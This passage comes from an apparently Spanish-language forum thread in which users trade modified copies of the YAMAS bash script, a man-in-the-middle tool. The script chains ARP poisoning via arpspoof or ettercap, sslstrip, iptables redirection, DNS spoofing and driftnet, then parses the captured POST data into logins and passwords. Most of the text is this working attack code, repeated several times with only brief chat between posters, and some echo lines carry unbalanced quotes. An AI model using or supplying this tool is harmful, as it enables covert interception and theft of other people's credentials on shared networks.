echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo
#Arpspoofing
echo
echo -e "\033[31m - Activating ARP cache poisoning... \033[m"
echo
ip route show | awk '(NR == 1) { print "Gateway :", $3," ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 1) { print $5}')
gateway=$(ip route show | awk '(NR == 1) { print $3}') #store gateway ip
echo
echo "Enter IP gateway adress or press enter to use $gateway."
read -e gateway
if [ "$gateway" = "" ];then
gateway=$(ip route show | awk '(NR == 1) { print $3}') #restore gateway ip since pressing enter set our var to null
echo -e "$gateway selected as default.\n"
fi
echo
echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
read -e iface
if [ "$iface" = "" ];then
iface=$(ip route show | awk '(NR == 1) { print $5}') #store default interface
echo -e "$iface selected as default.\n"
fi
echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]];then
echo -e "\nDo you want to map the network to show live hosts? (Y/N) [This might take up to 30 secs, be patient]"
read -e hosts
echo -e "\033[31m "
if [[ $hosts = "Y" || $hosts = "y" ]];then
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -e "\033[m " # switch color back to white
else
echo -e "\033[m "
fi
echo -e "Please enter targets according to usage : IP1 IP2 IP3...
\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
arpspoofi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
}
ettercapi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp /$gateway/ /$1/ 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
}
read -e parameters
if [[ "$etter" = "1" ]];then
ettercapi $parameters
else
arpspoofi $parameters
fi
else
if [[ "$etter" = "1" ]];then
xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp // // &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
else
xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
fi
fi
echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "looparse(){
while :
do
clear
echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
cat /tmp/$filename.txt |
awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
egrep -i -f '/tmp/grepcred.txt' |
awk -F \"=\" '{if (length(\$2) < 3) print \"\";
else if (\$1 ~/[W]/) print \$0;
else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
else print \"Login = \t\t\", \$2}' |
uniq
sleep 7
done
}
looparse" > /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.[/spoiler]
-
A ver yo lo tengo así:
[spoiler]
# #!/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX
if [ $UID -ne 0 ]; then
echo -e "\033[31This program must be run as root.
This will probably fail.\033[m"
sleep 3
fi
log_output_dir=~
sslstrip_dir=
ask_for_install=n
if [ ! -d "$log_output_dir" ]; then
mkdir -p $log_output_dir
fi
version="20120213"
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
fast_cleanup()
{
echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
if [[ $looparseid != "" ]];then
kill $looparseid
fi
if [[ $sslstripid != "" ]];then
kill $sslstripid
fi
if [[ $dnsid != "" ]];then
kill $dnsid
fi
if [[ $etterspoofid != "" ]];then
kill $etterspoofid
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
if [ -e '/tmp/looparse.sh' ]; then
rm /tmp/looparse.sh
fi
echo -e "\033[32m[-] Clean up successful !\033[m"
exit 0
}
#Let's define some arguments that can be passed to the script :
#generating grepcred.txt so that it doesn't have to be downloaded each time
#it was originally being downloaded so I could easily fix it, but there has
#been no fix to be done... So why use a file instead of a command line ?
#It's just much more easier this way.
echo -e "credential\nemail\nlast\nlog\nmodified\nname\nnickname\npass\npersistent\npw\nsession\ntextbox\nuser\nwebsite" > /tmp/grepcred.txt
while [ "$1" != "" ];do
case $1 in
-p | --parse)
if [[ $2 == "" ]]; then
echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
exit 0
fi
clear
echo -e "Parsing $2 for credentials.\n\n"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq
exit 0 ;;
-e | --etter) echo -e "\tYou will be using Ettercap instead of ARPspoof."
etter="1"
shift
sleep 0.5 ;;
-h | --help) clear
echo -e "You are running $0, version $version.
usage : $0 -h -c -p -e -s -f
-h or --help : Display this help message, disclaimer and exit.
-c or --change: Display changelog and todo.
-e : Use ettercap instead of ARPspoof. One might have one's reasons...
ARPspoof is default.
-p or --parse : Only parse the given <file>. Don't use wildcards.
Use > /output_file to print to a file.
-s : The script won't download anything. Make sure you have the needed files.
-f : Use a padlock favicon in sslstrip.
\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.
\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting."
exit 0 ;;
-c | --change)
clear
echo -e "\033[31m Changelog :\033[m
ToDo :
- FakeSSL -> Need help
\033[31mFeatures :\033[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are suported
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D
- Miscellaneous features
\033[31m Credits :\033[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to the people responsible for the tools I am using in this script.
Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-bt5 or send me a mail at contact.comax@gmail.com"
exit ;;
-s | --silent)
echo "silent mode ON"
silent="1"
shift ;;
-f | --fav)
echo "favicon mode ON"
fav="-f"
shift ;;
*) shift ;;
esac
done
### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
if [[ "$silent" = "1" ]]; then
message="\nNo message to display : you are running in silent mode"
else
message=$(curl --silent -q http://comax.fr/yamas/bt5/message) #store it to variable
fi
if [[ $1 = "-s" || $2 = "-s" ]]; then
echo "ASCII tables won't be available."
echo "ASCII tables are not available due to the use of silent mode." > /tmp/ascii
else
wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
fi
### Check for updates !
if [[ "$silent" = "1" ]];then
echo "Not checking for a new version : silent mode."
else
changelog=$(curl --silent -q http://comax.fr/yamas/bt5/changelog)
last_version=$(curl --silent -q http://comax.fr/yamas/bt5/version) #store last version number to variable
if [[ $last_version > $version ]];then # Comparing to current version
echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)
Last changes are :
$changelog"
read update
if [[ $update = Y || $update = y ]];then
echo "
wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
chmod +x $0
echo "[-] Script updated !"
if [[ $0 != '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
read install
if [[ $install = Y || $install = y ]];then #do not proceed to install if using installed version : updating it already "installed" it over.
cp $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
echo "Script should now be installed, launching yamas !"
sleep 3
yamas
exit 1
else
echo "Ok, continuing with updated version..."
sleep 3
$0
exit 1
fi
fi
sleep 2
$0
exit 1
else
echo "Ok, continuing with current version..."
fi
else
echo "No update available"
fi
fi
### End of update process
### Install process
if [[ ! -e '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo "Script is not installed. Do you want to install it ? (Y/N)"
read install
if [[ $install = Y || $install = y ]] ; then
cp -v $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
rm $0
echo "Script should now be installed. Launching it !"
sleep 3
yamas
exit 1
else
echo "Ok, not installing then !"
fi
else
echo "Script is installed"
sleep 1
fi
### End of install process
clear
echo -e "
\`YMM' \`MM' db \`7MMM. ,MMF' db .M\"\"\"bgd
VMA ,V ;MM: MMMb dPMM ;MM: ,MI \"Y
VMA ,V ,V^MM. M YM ,M MM ,V^MM. \`MMb.
VMMP ,M \`MM M Mb M' MM ,M \`MM \`YMMNq.
MM AbmmmqMA M YM.P' MM AbmmmqMA . \`MM
MM A' VML M \`YM' MM A' VML Mb dM
.JMML..AMA. .AMMA..JML. \`' .JMML..AMA. .AMMA.P\"Ybmmd\" " # <= I love it.
echo -e "===========================================================================
=\033[31m Welcome to Yet Another MITM Automation Script.\033[m =
=\033[31m Use this tool responsibly, and enjoy!\033[m =
= Feel free to contribute and distribute this script as you please. =
= Official thread : http://tinyurl.com/yamas-bt5 =
= Check out the help (-h) to see new features and informations =
= You are running version \033[32m$version\033[m =
==========================================================================="
echo -e "\033[36mMessage of the day :\033[m"
echo -e "$message"
echo
# Starting fresh : reset IP forward and iptables
echo -e "\033[31m - Cleaning iptables \033[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."
# Defining exit function and other ending features
cleanup()
{
echo
echo -e "\033[31m- Killing processes and resetting iptable.\033[m"
kill $sslstripid
kill $looparseid
if [[ $drifton = 1 ]]; #if driftnet was used
then
killall driftnet && killall driftnet #kill the unbeliever
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm /tmp/looparse.sh
echo -e "\033[32m[-] Clean up successful !\033[m"
echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
echo "(If you want to keep it, it will be stored in $log_output_dir/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]];then # double brackets because double condition. || signifies "or"
cp /tmp/$filename.txt $log_output_dir/$filename.txt #moving file
if [ -f "$log_output_dir/$filename.txt" ]; then #check if it exists
echo "Log file copied !" #it does
else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
fi
else
echo "Logs not saved"
fi
echo -e "\nDo you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in $log_output_dir/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]];then # double brackets because double condition. || signifies "or"
cat /tmp/$filename.txt |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq >> $log_output_dir/$filename.pass.txt # >> appends to a potential previous file.
if [ -f "$log_output_dir/$filename.pass.txt" ]; then #check if it exists
echo "Passwords saved !" #it does
else
echo "Error while saving passwords" #it does not
fi
else
echo "Password saving skipped."
fi
rm /tmp/$filename.txt
echo -e "\nTemporary files deleted."
if [[ -f "/usr/bin/yamas" && $ask_for_install != 'y' ]];then #check if script is already installed
echo -e "\n\n"
exit 1 #if yes, exit.
else
echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
read -e install
case $install in
Y | y | yes)
cp $0 /usr/bin/yamas #copy and rename script
echo -e "\033[32m Script installed !\033[m" ;;
*) echo "Script not installed." ;;
esac
fi
exit 1
}
search=$(ip route show | awk '(NR == 2) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.
rescan ()
{
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
echo -en "\033[m"
final
}
add_target()
{
echo "Enter a new IP adress to attack :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
final
}
ascii()
{
clear
cat /tmp/ascii
rm /tmp/ascii
final
}
dns_spoof()
{
### Make Host function###
mkhst()
{
echo "Enter your redirection list line by line. End with #.
Usage is : 127.0.0.1 foo.bar.com
Wildcards may be used."
rm ~/hosts_spoof
while :
do
read input
echo "$input" >> ~/hosts_spoof
if [[ $input == "#" ]];then
break
fi
done
}
###EOfunc###
echo "If you already have a host file, enter its path. If you don't, press enter."
read gothost
if [[ $gothost != "" ]];then
echo "Host file $gothost will be used."
else
echo -e "We'll make one...\n"
mkhst
fi
xterm -geometry 90x3-1-1 -T "DNS spoofing" -e dnsspoof -i $iface -f ~/hosts_spoof & dnsid=$!
}
choose_dns()
{
echo "Would you like to use Ettercap 'dns_spoof' plugin or dnsspoof (E/D) ? Press a to abort"
read spoofpgm
case $spoofpgm in
E) echo "We'll use ettercap. Make sure to have edited /usr/share/ettercap/etter.dns"
ettercap -D -q -i $iface -T -P dns_spoof & etterspoofid=$! ;;
D) echo "We'll use dnsspoof."
dns_spoof ;;
a | A) final ;;
*) echo "Wrong choice. Please use E or D"
choose_dns;;
esac
final
}
misc()
{
echo -e "\nHere are the miscellanous features.
1. Image sniffing
2. DNS spoofing
3. Previous menu."
read misc
case $misc in
1) mkdir $log_output_dir/capture_$(date +%d%m%y) && driftnet -i $iface -a -d $log_output_dir/capture_$(date +%d%m%y) > /dev/null & driftnet -i $iface &> /dev/null &
drifton=1 &
echo "Driftnet launched, the images will be saved in $log_output_dir/capture_$(date +%d%m%y)"
misc ;;
2) choose_dns ;;
3) final ;;
*) echo "bad choice"
misc ;;
esac
}
rtparse()
{
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch
realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out? It's singular options without a space, so I think the need for quotes is NOT needed??
1) echo -e "\033[33m
kill -19 $looparseid
echo -e "\033[33m[-]Paused.\033[m"
rtparse;;
2) echo -e "\033[33m
kill -18 $looparseid
echo -e "\033[33m[-]Resumed.\033[m"
rtparse;;
3) echo -e "\033[31m
kill $looparseid
echo -e "\033[33m[-]Killed.\033[m"
rtparse;;
4) echo -e "\033[32m
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
sleep 2
echo -e "\033[33m[-]Launched.\033[m"
rtparse;;
5) echo "Previous"
final ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #Professional Language =)
rtparse;;
esac
}
final()
{
echo -e "\n\033[32mAttack is running\033[m. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Real-time parsing...
5. Misc features.
6. Quit properly.
Enter the number of the desired option."
read final
case $final in
1) rescan ;;
2) add_target ;;
3) ascii ;;
4) rtparse ;;
5) misc ;;
6) cleanup ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
final ;;
esac
}
###############################End of functions#############################
# IP forwarding
echo
echo -e "\033[31m - Activating IP forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."
#Iptables
echo
echo -e "\033[31m - Configuring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read -e outport
if [ "$outport" = "" ];then
outport=8080
echo -e "Port $outport selected as default.\n"
fi
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read -e inport
if [ "$inport" = "" ];then
inport=80
echo -e "Port $inport selected as default.\n"
fi
echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"
#Sslstrip
echo
echo -e "\033[31m - Activating sslstrip... \033[m"
echo "Choose filename to output : (default = yamas)"
read -e filename
if [ "$filename" = "" ];then
filename="yamas"
fi
echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"
if [ ! -e '/usr/bin/sslstrip' ];then # If sslstrip isn't installed
if [ ! -x '$sslstrip_dir/sslstrip.py' ];then #if non-installed is not executable
chmod +x $sslstrip_dir/sslstrip.py #make it executable
fi
$sslstrip_dir/sslstrip.py $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$! #launch non-installed
else
sslstrip $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
fi
sleep 4 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo
#Arpspoofing
echo
echo -e "\033[31m - Activating ARP cache poisoning... \033[m"
echo
ip route show | awk '(NR == 1) { print "Gateway :", $3," ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 1) { print $5}')
gateway=$(ip route show | awk '(NR == 1) { print $3}') #store gateway ip
echo
echo "Enter IP gateway adress or press enter to use $gateway."
read -e gateway
if [ "$gateway" = "" ];then
gateway=$(ip route show | awk '(NR == 1) { print $3}') #restore gateway ip since pressing enter set our var to null
echo -e "$gateway selected as default.\n"
fi
echo
echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
read -e iface
if [ "$iface" = "" ];then
iface=$(ip route show | awk '(NR == 1) { print $5}') #store default interface
echo -e "$iface selected as default.\n"
fi
echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]];then
echo -e "\nDo you want to map the network to show live hosts? (Y/N) [This might take up to 30 secs, be patient]"
read -e hosts
echo -e "\033[31m "
if [[ $hosts = "Y" || $hosts = "y" ]];then
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -e "\033[m " # switch color back to white
else
echo -e "\033[m "
fi
echo -e "Please enter targets according to usage : IP1 IP2 IP3...
\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
arpspoofi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
}
ettercapi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp /$gateway/ /$1/ 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
}
read -e parameters
if [[ "$etter" = "1" ]];then
ettercapi $parameters
else
arpspoofi $parameters
fi
else
if [[ "$etter" = "1" ]];then
xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp // // &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
else
xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
fi
fi
echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "looparse(){
while :
do
clear
echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
cat /tmp/$filename.txt |
awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
egrep -i -f '/tmp/grepcred.txt' |
awk -F \"=\" '{if (length(\$2) < 3) print \"\";
else if (\$1 ~/[W]/) print \$0;
else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
else print \"Login = \t\t\", \$2}' |
uniq
sleep 7
done
}
looparse" > /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.
[/spoiler]
El ultimo que has puesto lo miro ahora pero creo que al final hemos hecho lo mismo.
-
tienes el directorio de captura asi
~
yo lo apañe de otra manera.
voy a probar mas a fondo , con varias sesiones..a ver que pasa.
-
))))) , la he cagao...
borre el bueno , ..el code que puse no vale.,, :'(
otra vez a empezar.
aunque solo he de rectificar lo de las opciones..que me habia quedao bien , ¿para que un menu de elegir snifer de imagenes,si solo va el driftnet ?..voy a corregirlo.
-
tienes el directorio de captura asi
~
yo lo apañe de otra manera.
voy a probar mas a fondo , con varias sesiones..a ver que pasa.
~ = carpeta de usuario = en el caso de wifislax /root
Si ejecutas en la terminal "mkdir ~/pepito", veras como se crea el directorio /root/pepito,
eso no hace falta tocarlo, no se si me explico xD
-
))))) , la he cagao...
borre el bueno , ..el code que puse no vale.,, :'(
otra vez a empezar.
aunque solo he de rectificar lo de las opciones..que me habia quedao bien , ¿para que un menu de elegir snifer de imagenes,si solo va el driftnet ?..voy a corregirlo.
No te comas la cabeza, el que yo he puesto va bien, además yo también le borré el menú ese y lo puse para que directamente empiece a capturar.
Si es que ya te digo que al final habíamos hecho lo mismo xD
-
;D ;D ;D le puse lo de modified by ..por que le hemos retocado bastante del original.
[spoiler]# #!/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX
# Modified by www.seguridadwireless.net
if [ $UID -ne 0 ]; then
echo -e "\033[31This program must be run as root.
This will probably fail.\033[m"
sleep 3
fi
log_output_dir=/root/driftnet
sslstrip_dir=
ask_for_install=n
if [ ! -d "$log_output_dir" ]; then
mkdir -p $log_output_dir
fi
version="20120213"
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
fast_cleanup()
{
echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
if [[ $looparseid != "" ]];then
kill $looparseid
fi
if [[ $sslstripid != "" ]];then
kill $sslstripid
fi
if [[ $dnsid != "" ]];then
kill $dnsid
fi
if [[ $etterspoofid != "" ]];then
kill $etterspoofid
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
if [ -e '/tmp/looparse.sh' ]; then
rm /tmp/looparse.sh
fi
echo -e "\033[32m[-] Clean up successful !\033[m"
exit 0
}
#Let's define some arguments that can be passed to the script :
#generating grepcred.txt so that it doesn't have to be downloaded each time
#it was originally being downloaded so I could easily fix it, but there has
#been no fix to be done... So why use a file instead of a command line ?
#It's just much more easier this way.
echo -e "credential\nemail\nlast\nlog\nmodified\nname\nnickname\npass\npersistent\npw\nsession\ntextbox\nuser\nwebsite" > /tmp/grepcred.txt
while [ "$1" != "" ];do
case $1 in
-p | --parse)
if [[ $2 == "" ]]; then
echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
exit 0
fi
clear
echo -e "Parsing $2 for credentials.\n\n"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq
exit 0 ;;
-e | --etter) echo -e "\tYou will be using Ettercap instead of ARPspoof."
etter="1"
shift
sleep 0.5 ;;
-h | --help) clear
echo -e "You are running $0, version $version.
usage : $0 -h -c -p -e -s -f
-h or --help : Display this help message, disclaimer and exit.
-c or --change: Display changelog and todo.
-e : Use ettercap instead of ARPspoof. One might have one's reasons...
ARPspoof is default.
-p or --parse : Only parse the given <file>. Don't use wildcards.
Use > /output_file to print to a file.
-s : The script won't download anything. Make sure you have the needed files.
-f : Use a padlock favicon in sslstrip.
\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.
\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting."
exit 0 ;;
-c | --change)
clear
echo -e "\033[31m Changelog :\033[m
ToDo :
- FakeSSL -> Need help
\033[31mFeatures :\033[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are suported
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D
- Miscellaneous features
\033[31m Credits :\033[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to the people responsible for the tools I am using in this script.
Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-bt5 or send me a mail at contact.comax@gmail.com"
exit ;;
-s | --silent)
echo "silent mode ON"
silent="1"
shift ;;
-f | --fav)
echo "favicon mode ON"
fav="-f"
shift ;;
*) shift ;;
esac
done
### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
if [[ "$silent" = "1" ]]; then
message="\nNo message to display : you are running in silent mode"
else
message=$(curl --silent -q http://comax.fr/yamas/bt5/message) #store it to variable
fi
if [[ $1 = "-s" || $2 = "-s" ]]; then
echo "ASCII tables won't be available."
echo "ASCII tables are not available due to the use of silent mode." > /tmp/ascii
else
wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
fi
### Check for updates !
if [[ "$silent" = "1" ]];then
echo "Not checking for a new version : silent mode."
else
changelog=$(curl --silent -q http://comax.fr/yamas/bt5/changelog)
last_version=$(curl --silent -q http://comax.fr/yamas/bt5/version) #store last version number to variable
if [[ $last_version > $version ]];then # Comparing to current version
echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)
Last changes are :
$changelog"
read update
if [[ $update = Y || $update = y ]];then
echo "
wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
chmod +x $0
echo "[-] Script updated !"
if [[ $0 != '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
read install
if [[ $install = Y || $install = y ]];then #do not proceed to install if using installed version : updating it already "installed" it over.
cp $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
echo "Script should now be installed, launching yamas !"
sleep 3
yamas
exit 1
else
echo "Ok, continuing with updated version..."
sleep 3
$0
exit 1
fi
fi
sleep 2
$0
exit 1
else
echo "Ok, continuing with current version..."
fi
else
echo "No update available"
fi
fi
### End of update process
### Install process
if [[ ! -e '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
